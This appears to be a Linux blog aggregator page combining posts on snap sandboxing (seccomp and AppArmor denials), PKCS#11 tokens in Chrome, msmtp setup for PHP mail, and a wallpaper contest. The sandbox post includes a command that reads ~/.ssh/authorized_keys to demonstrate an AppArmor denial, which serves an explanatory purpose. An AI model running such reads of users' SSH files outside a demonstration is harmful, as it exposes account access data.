Seccomp is used to constrain the system calls that an application can use. System calls are the interface between the kernel and user space. If you are unfamiliar with the concept then don’t worry. In very rough terms, some of the functions of your programming language are implemented as system calls, and seccomp is the Linux subsystem that is responsible for mediating access to them.

Right now, when your application runs in devmode, you will not get any advice about system calls you rely on that are not allowed by the set of interfaces you use. The so-called complain mode of seccomp is being actively developed upstream, so the situation may change by the time you are reading this.

In strict confinement any attempt to use a disallowed system call will instantly kill the offending process. This is accompanied by a rather cryptic message that you can see in the system log:
sie 08 12:36:53 gateway kernel: audit: type=1326 audit(1470652613.076:27): auid=1000 uid=1000 gid=1000 ses=63 pid=66834 comm="links" exe="/snap/links/2/usr/bin/links" sig=31 arch=c000003e syscall=54 compat=0 ip=0x7f8dcb8ffc8a code=0x0
What this tells us is that process ID 66834 was killed with signal 31 (SIGSYS) because it tried to use system call 54 (setsockopt). Note that system call numbers are architecture-specific; the output above was from an amd64 machine.
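
If you want to translate such a number back into a name yourself, the scmp_sys_resolver tool from the libseccomp project can do it. A quick sketch (on Ubuntu the tool is, to the best of my knowledge, shipped in the seccomp package):

sudo apt-get install seccomp
scmp_sys_resolver -a x86_64 54    # should print: setsockopt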

Even when a system call is allowed, the particular operation may be intercepted and denied by apparmor. For example, the sandbox is set up so that applications can freely write to $SNAP_USER_DATA (or $SNAP_DATA for services) but cannot, by default, either read or write from the real home directory.
sie 08 12:56:40 gateway kernel: audit: type=1400 audit(1470653800.724:28): apparmor="DENIED" operation="open" profile="snap.snapd-hacker-toolbelt.busybox" name="/home/zyga/.ssh/authorized_keys" pid=67013 comm="busybox" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000

Here we see that process ID 67013 tried to “open” /home/zyga/.ssh/authorized_keys and that the “r” (read) mask was denied. In devmode the access is allowed, but it is accompanied by an appropriate warning message instead.
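
Both sides of this are easy to reproduce from the busybox shell used earlier (a sketch; it assumes $USER is set in the inherited environment and that your real ~/.ssh contains something to read):

echo hello > $SNAP_USER_DATA/note.txt       # allowed: per-snap, per-user writable area
cat $SNAP_USER_DATA/note.txt
cat /home/$USER/.ssh/authorized_keys        # denied under strict confinement, with an audit entry like the one above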

TIP: Whenever you run into problems like this you should give the snappy-debug snap a try. It is designed to read and understand messages like that and give you useful advice.

Apparmor has a much wider feature set and can perform checks on Linux capabilities, traditional UNIX IPC such as signals and sockets, and DBus messages (including details of the object and method invoked). The vast majority of the current snap confinement is implemented with apparmor profiles. We will look at all the features in greater detail in the next few articles in this series, where we will actively implement simple new interfaces from scratch.

There's one last thing that snap-confine does: in some cases it creates...

A device control group

In certain cases a device control group is created and the application process is moved into it. The control group contains only a small set of typical device nodes (e.g. /dev/null) plus explicitly defined additional devices. This is done by using udev rules to tag the appropriate devices. This is listed for completeness; you should rarely need to worry about or even think about this topic. Once the need arises we will explore it and how it can be used to simplify handling of certain situations. Again, by default there is no device control group being used.
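
If you are curious whether a particular snap application ended up in such a group, you can peek at its cgroup membership from inside the snap. A hedged sketch (the exact group name is an implementation detail and may differ; a plain “/” simply means the default group):

grep devices /proc/self/cgroup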

Putting it all together

With all of those changes in place snap-confine executes (using execv) a wrapper script corresponding to the application command entry in the snapcraft.yaml file. This happens each time you run an application.
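
If you want to see what such a wrapper looks like, you can list the snap's directory and read the generated wrapper from there. A sketch (the wrapper file name in the comment is hypothetical; look for whatever wrapper file your snap actually contains):

ls /snap/snapd-hacker-toolbelt/current
# then cat the generated command wrapper you find there, for example:
# cat /snap/snapd-hacker-toolbelt/current/command-busybox.wrapper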

If you are interested in learning more about snap-confine I encourage you to check out its manual page (snap-confine.5) and source code. If you have any questions please feel free to ask at the snapcraft.io mailing list or using comments on this blog below.

Next time we will look at creating our first, extremely simple, interface in practice.

Appendix A: List of host directories that are bind-mounted.

NOTE: This list will slowly get less and less accurate as more of the mount points become dynamic and controlled by available interfaces.
  • /dev
  • /etc (except for /etc/alternatives)
  • /home
  • /root
  • /proc
  • /snap
  • /sys
  • /var/snap
  • /var/lib/snapd
  • /var/tmp
  • /var/log
  • /run
  • /media
  • /lib/modules
  • /usr/src
on August 08, 2016 03:14 PM

Using PKCS#11 on GNU/Linux

Paul Tagliamonte

PKCS#11 is a standard API to interface with HSMs, Smart Cards, or other types of random hardware-backed crypto. On my travel laptop, I use a few Yubikeys in PKCS#11 mode using OpenSC to handle system login. libpam-pkcs11 is a pretty easy-to-use module that will let you log into your system locally using a PKCS#11 token.
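
For context, the login part mostly comes down to installing the module and wiring it into PAM. A rough sketch (the PAM line below is an assumption about a typical setup rather than a copy of my config; consult the libpam-pkcs11 documentation before touching /etc/pam.d):

sudo apt-get install libpam-pkcs11 opensc
# then add a line along these lines to /etc/pam.d/common-auth, above the pam_unix.so entry:
#   auth sufficient pam_pkcs11.so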

One of the least documented things, though, was how to use an OpenSC PKCS#11 token in Chrome. First, close all web browsers you have open.

sudo apt-get install libnss3-tools

certutil -U -d sql:$HOME/.pki/nssdb
modutil -add "OpenSC" -libfile /usr/lib/x86_64-linux-gnu/opensc-pkcs11.so -dbdir sql:$HOME/.pki/nssdb
modutil -list "OpenSC" -dbdir sql:$HOME/.pki/nssdb 
modutil -enable "OpenSC" -dbdir sql:$HOME/.pki/nssdb

Now we'll have the PKCS#11 module ready for NSS to use, so let's double-check that the tokens are registered:

certutil -U -d sql:$HOME/.pki/nssdb
certutil -L -h "OpenSC" -d sql:$HOME/.pki/nssdb

If this winds up causing issues, you can remove it using the following command:

modutil -delete "OpenSC" -dbdir sql:$HOME/.pki/nssdb
on August 08, 2016 12:17 AM

August 07, 2016

A few years ago, I remember that Ubuntu had a trick that allowed the distribution to be installed as one large file within a Windows partition. Does the same thing exist to install Debian?
on August 07, 2016 05:18 PM

I previously wrote an article about configuring msmtp on Ubuntu 12.04 but, as I hinted at in my previous post, that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (e.g. <PASSWORD>) are things that need replacing with values specific to your configuration. The exception is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output, which should make diagnosing problems after the test relatively easy. If all is successful, you should now be able to use PHP's mail() function (which, at the very least, WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).
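
If you want to rule PHP out entirely while debugging, you can also exercise msmtp directly from the shell with the same configuration (a sketch; it runs as root so the locked-down /etc/msmtprc is readable, and you should substitute your own account name and destination address):

printf 'Subject: msmtp test\n\nTest body text\n' | sudo msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> personal@email.com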

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

on August 07, 2016 03:56 PM

August 06, 2016

budgie-remix 16.10 "Yakkety Yak" wallpaper contest. We invite everyone to contribute, even if you are not currently a budgie-remix user. For guidelines, rules & submissions, see the official Flickr group: https://www.flickr.com/groups/budgie-remix-16-10/
on August 06, 2016 02:59 PM